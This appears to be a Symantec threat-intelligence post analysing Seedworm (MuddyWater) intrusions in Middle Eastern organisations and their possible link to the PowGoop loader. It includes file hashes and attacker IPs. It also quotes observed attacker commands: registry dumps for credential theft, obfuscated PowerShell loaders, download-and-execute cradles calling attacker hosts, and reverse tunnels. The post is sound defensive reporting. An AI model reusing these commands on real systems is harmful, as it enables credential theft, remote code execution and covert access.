Posted: 7 Min ReadThreat Intelligence

Seedworm: Iran-Linked Group Continues to Target Organizations in the Middle East

Group continues to be highly active in 2020, while tentative links to recently discovered PowGoop tool suggest possible retooling.

The Iran-linked espionage group Seedworm (aka MuddyWater) has been highly active in recent months, attacking a wide range of targets, including a large number of government organizations in the Middle East.

Many of the organizations attacked by Seedworm in recent months have also been targeted by a recently discovered tool called PowGoop (Downloader.Covic), suggesting that it is a tool that Seedworm has incorporated into its arsenal. However, at present Symantec, a division of Broadcom (NASDAQ: AVGO), can only make a medium-confidence link between Seedworm and PowGoop.

The recent wave of Seedworm attacks were uncovered by Symantec’s Targeted Attack Cloud Analytics, which leverages advanced machine learning to spot patterns of activity associated with targeted attacks. The activity was reviewed by Symantec’s Threat Hunter team (part of Symantec’s Endpoint Security Complete offering) which linked it to previous Seedworm activity.

Among the things flagged by Cloud Analytics was a registry key called “SecurityHealthCore". The code residing in this registry key is executed by PowerShell from a scheduled task. In all of the organizations where this registry key was found, a known Seedworm backdoor (Backdoor.Mori) was subsequently detected.

Attacks were uncovered against targets in Iraq, Turkey, Kuwait, the United Arab Emirates, and Georgia. In addition to some government entities, organizations in the telecoms and computer services sector were also targeted.

In one such victim, a sample of Backdoor.Mori was dropped and installed as early as December 2019 on a SQL server. Seedworm activity continued until at least July 2020, with the installation of additional hacking tools by the attackers.

Table 1. Backdoor.Mori samples used by Seedworm in one organization
File SHA2 File path Filename Parent file SHA2 Description
fd0b8a09f02319f6127f5d17e3070174d6aa0714fcdd3794a0a732f380f13747 csidl_profile\public iq1.exe Mori backdoor
59d50a7b0a49642c8a85601e1c97edeba0a711cd1c802710f5d3fdc08b2673dd csidl_system_drive\program files\nfc fml.dll fd0b8a09f02319f6127f5d17e3070174d6aa0714fcdd3794a0a732f380f13747 Mori backdoor
4bbcbf1dba0cdd4afa13b62f258aba3aecbcae0f80794b060044a48c499feabc csidl_common_appdata iq5.exe Mori backdoor
881226d3186f4904e8a7cecae3b5690696a74828035caa0041ea07b57aaa4557 csidl_system_drive\program files\nfc fml.dll Mori backdoor
70400207a45e77baf25497219c2b9e725246207f10afe67e15b0c274f8895aa9 csidl_common_appdata Iq3.exe Mori backdoor
8a53d01ca46ec0fab30eb7deab8b083f91a364fcb7f198625e5db2ae43e4cff7 csidl_system_drive\program files\nfc Fml.dll Mori backdoor

During this time, Symantec observed Seedworm performing credential-stealing activities as well as setting up tunnels to its own infrastructure to assist with lateral movement using an open-source tools known as Secure Sockets Funneling (SSF) and Chisel. Seedworm is known to have leveraged Chisel in the past.

Credential stealing

Credential dumping was done by dumping the contents of the Windows Registry to files in the same directories as Seedworm backdoors. Additionally, Seedworm was also observed using Quarks password dumper (Quarks PwDump) to steal local account password hashes.

  • reg save hklm\system CSIDL_PROFILE\public\system.c
  • reg save hklm\sam CSIDL_PROFILE\public\sam.c
  • CSIDL_COMMON_APPDATA\dump.exe --dump-hash-local (sha2: f9c4f95592d0e543bca52f5882eace65fe3bbbb99bcaae6e97000115fb3cb781)

Tunneling back to the attackers’ infrastructure

Seedworm was also observed setting up tunnels to its own infrastructure using Secure Sockets Funneling and Chisel. These tools allow the attackers to configure local and remote port forwarding as well as copying files to compromised machines.

Table 2. Hacking tools used by Seedworm in one organization
File SHA2 File path Filename Parent file SHA2 Description
19ec3f16a42ae58ab6feddc66d7eeecf91d7c61a0ac9cdc231da479088486169 csidl_common_appdata\ssf ssf.exe 5c54bd254b752133577df4d8a901cd37562881cab3bd08aee3475355a9740d89 Secure Sockets Funneling tool
c4599f05a8d44bd315da646064adcf2c90886a705a071f0650ee6d17b739d5c8 csidl_common_appdata\ssf upx-ssf.exe 5c54bd254b752133577df4d8a901cd37562881cab3bd08aee3475355a9740d89 Secure Sockets Funneling tool
ad594fa71852bd5652b0c594d5453155d8da8b6f67fcf63b459190d93adf2d88 csidl_common_appdata chisel.exe Chisel tool

The PowGoop connection

On the same machine where Seedworm was active, a tool known as PowGoop was deployed. This same tool was also deployed against several of the organizations attacked by Seedworm in recent months; however, at present Symantec can only establish a medium-confidence link between PowGoop and Seedworm.

PowGoop, which was first publicly reported on in July 2020, is a loader DLL. It likely arrives in a ZIP file named ‘google.zip’ containing the loader itself and legitimate Google binaries used for side-loading it.

In the same organization as mentioned previously, Symantec observed Seedworm activity which was followed by PowGoop activity just six days later.

Table 3. Mori backdoor and hacking tools used by Seedworm several days before PowGoop was deployed
Timestamp File SHA2 File path Filename Description
30/12/2019 19:00 fd0b8a09f02319f6127f5d17e3070174d6aa0714fcdd3794a0a732f380f13747 csidl_profile\public iq1.exe Mori backoor
20/01/2020 18:23 4bbcbf1dba0cdd4afa13b62f258aba3aecbcae0f80794b060044a48c499feabc csidl_common_appdata iq5.exe Mori backoor
27/05/2020 10:08 19ec3f16a42ae58ab6feddc66d7eeecf91d7c61a0ac9cdc231da479088486169 csidl_common_appdata\ssf ssf.exe Secure Scokets Funneling tool
27/05/2020 10:08 c4599f05a8d44bd315da646064adcf2c90886a705a071f0650ee6d17b739d5c8 csidl_common_appdata\ssf upx-ssf.exe Secure Scokets Funneling tool
27/05/2020 10:37 ad594fa71852bd5652b0c594d5453155d8da8b6f67fcf63b459190d93adf2d88 csidl_common_appdata chisel.exe Chisel tool
27/05/2020 20:49 ad594fa71852bd5652b0c594d5453155d8da8b6f67fcf63b459190d93adf2d88 csidl_common_appdata chisel.exe Chisel tool
01/06/2020 12:10 ad594fa71852bd5652b0c594d5453155d8da8b6f67fcf63b459190d93adf2d88 csidl_common_appdata chisel.exe Chisel tool
10/06/2020 22:55 881226d3186f4904e8a7cecae3b5690696a74828035caa0041ea07b57aaa4557 csidl_system_drive\program files\nfc fml.dll Mori backdoor
23/06/2020 18:04 c4599f05a8d44bd315da646064adcf2c90886a705a071f0650ee6d17b739d5c8 csidl_common_appdata\ssf upx-ssf.exe Secure Scokets Funneling tool
23/06/2020 18:04 19ec3f16a42ae58ab6feddc66d7eeecf91d7c61a0ac9cdc231da479088486169 csidl_common_appdata\ssf ssf.exe Secure Scokets Funneling tool
29/06/2020 14:38 a224cbaaaf43dfeb3c4f467610073711faed8d324c81c65579f49832ee17bda8 CSIDL_COMMON_APPDATA\aidabrunhilde goopdate.dll PowGoop

In the majority of recent infections, PowGoop appears to have been deployed via a remote execution tool known as Remadmin. This tool is used to execute PowerShell to read and decode the contents of a file which is used to execute the contents in memory. It appears this code is used to load PowGoop’s main DLL (goopdate.dll) via rundll32.exe.

  • powershell -exec bypass "$a=gc C:\WINDOWS\TEMP\ManyaBetta;del C:\WINDOWS\TEMP\ManyaBetta;function Gabrielle($OliviaTomi){$Emlyn = [System.Convert]::FromBase64String($OliviaTomi);return [System.Text.Encoding]::UTF8.GetString($Emlyn);}function Tina($Daisi){$OliviaTomi = [System.Text.Encoding]::UTF8.GetBytes($Daisi);for ($TheresitaNitaChad=0; $TheresitaNitaChad -le $OliviaTomi.count -1; $TheresitaNitaChad++){$OliviaTomi[$TheresitaNitaChad] = $OliviaTomi[$TheresitaNitaChad] - 2;}return [System.Text.Encoding]::UTF8.GetString($OliviaTomi);}function GlyndaMaureen($OliviaTomi){$Rosalinde = Gabrielle $OliviaTomi;$LeonaJolene = Tina $Rosalinde;return $LeonaJolene;};$t =GlyndaMaureen($a);&($ShellId[1] + 'ex') $t;"

A feature of these files is that they have distinctive variable and function naming that resembles human names concatenated together. We have no reason to believe that these are actual people’s names.

On several of the victim machines, a ZIP file called ‘google.zip’ was also found present in the same directory. How the ZIP file arrives on the victim’s computer remains unknown. The ZIP contains a mix of legitimate Google executables and malicious DLL files. A legitimate ‘googleupdate.exe’ file is used to side load PowGoop via rundll32.exe. PowGoop loaders are used to decode and execute the contents of a file called ‘config.txt’. All config.txt files found to date contained PowerShell scripts that download and execute more PowerShell code.

  • powershell -exec bypass "function bdec($in){$out = [System.Convert]::FromBase64String($in);return [System.Text.Encoding]::UTF8.GetString($out);}function bDec2($szinput){$in = [System.Text.Encoding]::UTF8.GetBytes($szinput);for ($i=0; $i -le $in.count -1; $i++){$in[$i] = $in[$i] - 2;}return [System.Text.Encoding]::UTF8.GetString($in);}function bDd($in){$dec = bdec $in;$temp = bDec2 $dec;return $temp;}$a=get-content " config.txt";$t =bDd $a;&($ShellId[1] + 'ex') $t;"
  • Rundll32.exe CSIDL_COMMON_APPDATA\andreavania\goopdate.dll,dllregisterserver

In some cases, PowGoop is used to launch ‘Wscript.exe’ to execute an unknown VBS file called ‘v.txt’.

  • "CSIDL_SYSTEM\wscript.exe" /e:vbs CSIDL_PROFILE\[REDACTED]\documents\v.txt

Similarly, Symantec also observed legitimate tools (openssl.exe) and a downloader tool (ssleay32.dll) present in the same directories used to download additional tools:

  • CSIDL_SYSTEM\rundll32.exe CSIDL_COMMON_APPDATA\georgettaemilee\ssleay32.dll ,DllRegisterServer http://107.173.141.103:443/downloadc.php?key=[REDACTED]
  • CSIDL_SYSTEM\rundll32.exe CSIDL_COMMON_APPDATA\samariaantonina\ssleay32.dll ,DllRegisterServer http://107.173.141.114:443/downloadc.php?key=[REDACTED]

Similar download requests were also observed via PowerShell:

  • powershell -exec bypass $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$AaA = "Do";$AaB = " wnloadStr";$AaC = "ing";$s="$AaA$AaB$AaC"('http://23.95.220.166:80/download.php?k=564');$s;"
  • $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;start-sleep 10;$s=$V.DownloadString('http://104.168.44.16:443/H6qy8yvXhV69mF8CgpmWwKb1oV19xMqaI');iex($s)

During PowGoop activity, Symantec also observed the attackers using the Secure Sockets Funneling tool as well as Chisel suggesting a link between the two sets of activity.

  • "CSIDL_PROFILE\[REDACTED]\documents\ussf.exe" -c CSIDL_PROFILE\[REDACTED]\documents\config.txt -F 9900 -p [REDACTED] 107.172.97.172
  • CSIDL_COMMON_APPDATA\sharp.cmd client 107.175.0.140:443 R:8888:127.0.0.1:9999
  • CSIDL_COMMON_APPDATA\sharp.cmd server -p [REDACTED] --socks5

Additional links between Seedworm and PowGoop

In several recent Seedworm attacks, PowGoop was used on computers that were also infected with known Seedworm malware (Backdoor.Mori). In addition to this, activity involving Seedworm’s Powerstats (aka Powermud) backdoor appears to have been superseded by DLL side-loading of PowGoop.

Additionally, during PowGoop activity, we also observed the attackers downloading tools and some unknown content from GitHub repos, similar to what has been reported on Seedworm‘s Powerstats in the past.

  • powershell -exec bypass $e=new-object net.webclient;$e.proxy=[Net.WebRequest]::GetSystemWebProxy();$e.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$aa=$e.DownloadString('https://gist.githubusercontent.com/ffcommax/24587757d3328672954e4155a45ceb02/raw/58954a192b9f10753ad140128b97e54a663ae443/123.txt');iex($aa)

These patterns of activity beg the question as to whether PowGoop is actually an evolution of Powerstats rather than a completely new tool. To date, there is insufficient evidence to confirm this hypothesis. However, there are several similarities between the tools:

  • Use of hard-coded GUID tokens and proxy URLs for command and control (C&C) communications
  • Fetching and executing commands from C&C servers using PowerShell
  • Some low-confidence similarities in code structure and encoding techniques

While none of this is sufficient to confirm that PowGoop has evolved from Powerstats, Symantec continues to monitor the activity of Seedworm for any additional evidence.

Thanos ransomware link

PowGoop has, in recent weeks, been loosely linked to a variant of ransomware known as Thanos. Thanos is an aggressive form of ransomware which, in addition to encryption, will also attempt to overwrite the master boot record (MBR) of the infected computer.

Our peers at Palo Alto Networks reported that PowGoop was found at a Middle Eastern state-run organization which was also hit by Thanos. This lead to the suspicion that the Thanos attackers were using PowGoop in their attacks; however, Palo Alto could not confirm the connection.

Symantec has not found any evidence of a wiper or ransomware on computers infected with PowGoop. This suggests that either the simultaneous presence of PowGoop and Thanos in one attack was a coincidence or, if the two are linked, that PowGoop is not used exclusively to deliver Thanos.

Symantec uncovered attacks involving PowGoop against organizations in Iraq, Afghanistan, Israel, Turkey, Azerbaijan, Georgia, Cambodia, and Vietnam. Sectors targeted included governments, technology, telecoms, oil and gas, real estate, and education.

Vigilance required

Seedworm has been one of the most active Iran-linked groups in recent months, mounting apparent intelligence-gathering operations across the Middle East. While the connection between PowGoop and Seedworm remains tentative, it may suggest some retooling on Seedworm’s part. Any organizations who do find evidence of PowGoop on their networks should exercise extreme caution and perform a thorough investigation.

Protection

The following protections are in place to protect customers against Seedworm attacks:

File-based protection

  • Backdoor.Mori
  • Backdoor.Powemuddy
  • Downloader.Covic

Network-based protection

  • System Infected: Trojan.Backdoor Activity 243

Indicators of Compromise

IOC type IOC Description
file_sha2 200e2448b5ea343f8224f1b3945842bc33cedd9a543930d9b0f038508f00fc82 PowGoop/Covic
file_sha2 dbcaf92cef112cc438014df4d70acc4e05d68fcbd1d3d9a946130babe7fb94fd PowGoop/Covic
file_sha2 3621bb900674cd249f3c93a442d06af0a390bf773c26fc0506b568fd9e395d9f PowGoop/Covic
file_sha2 1827f822af72998e2c2e17c1fbc1e97892419ccad0ffe803e38a6f9b3e62ef1a PowGoop/Covic
file_sha2 be202975c100caf7d85ad7e98e38279280e7c63482dd421bbce1495755c75622 PowGoop/Covic
file_sha2 9f4c3cdb011798335258549f5e660dbf65a0f44ed991f12d1fd16c075879c942 PowGoop/Covic
file_sha2 a224cbaaaf43dfeb3c4f467610073711faed8d324c81c65579f49832ee17bda8 PowGoop/Covic
file_sha2 85859c909b1da57733dbf8be36a0aad73b97113914e34f32c478ce75e5511c8d google.zip
file_sha2 3c2fe308c0a563e06263bbacf793bbe9b2259d795fcc36b953793a7e499e7f71 Remadmin
file_sha2 c4599f05a8d44bd315da646064adcf2c90886a705a071f0650ee6d17b739d5c8 Secure Sockets Funneling tool
file_sha2 7200e2d151aa73a89311f5dd1b6f41b0aac653b377ee9106a7883ba9120d6985 Secure Sockets Funneling tool
file_sha2 59d50a7b0a49642c8a85601e1c97edeba0a711cd1c802710f5d3fdc08b2673dd Mori backdoor
file_sha2 4bbcbf1dba0cdd4afa13b62f258aba3aecbcae0f80794b060044a48c499feabc Mori backdoor
file_sha2 881226d3186f4904e8a7cecae3b5690696a74828035caa0041ea07b57aaa4557 Mori backdoor
file_sha2 fd0b8a09f02319f6127f5d17e3070174d6aa0714fcdd3794a0a732f380f13747 Mori backdoor
file_sha2 70400207a45e77baf25497219c2b9e725246207f10afe67e15b0c274f8895aa9 Mori backdoor
file_sha2 8a53d01ca46ec0fab30eb7deab8b083f91a364fcb7f198625e5db2ae43e4cff7 Mori backdoor
file_sha2 d3bbb2fee563108345db9d8b6feb72352ea7534798f72757a7e114bf94f2ac78 google.zip
file_sha2 9f2b765ba1361b77307f79d91472e99e142c716e22c410fe528771c233e08822 Mimikatz
file_sha2 950469b0acef00d8074eb1642d153675f07a13ab8eb4acada30c06df0c3261d2 Mimikatz
file_sha2 ad594fa71852bd5652b0c594d5453155d8da8b6f67fcf63b459190d93adf2d88 Chisel
command_line goopdate.dll, dllregisterserver PowGoop/ Covic
remote_ip 104.168.14.116 PowGoop/Covic
remote_ip 185.141.27.156 PowGoop/Covic
remote_ip 107.175.0.140 IP used with Chisel tool
remote_ip 107.173.181.139 IP used with Chisel tool
remote_ip 185.183.96.11 PowGoop/Covic
remote_ip 107.172.97.172 IP used with Secure Socket Funneling tool
remote_ip 192.210.214.83 PowGoop/Covic
remote_ip 107.173.141.103 PowGoop/Covic
remote_ip 107.173.141.114 PowGoop/Covic

About the Author

Threat Hunter Team

Symantec

The Threat Hunter Team is a group of security experts within Symantec whose mission is to investigate targeted attacks, drive enhanced protection in Symantec products, and offer analysis that helps customers respond to attacks.

Want to comment on this post?

We encourage you to share your thoughts on your favorite social platform.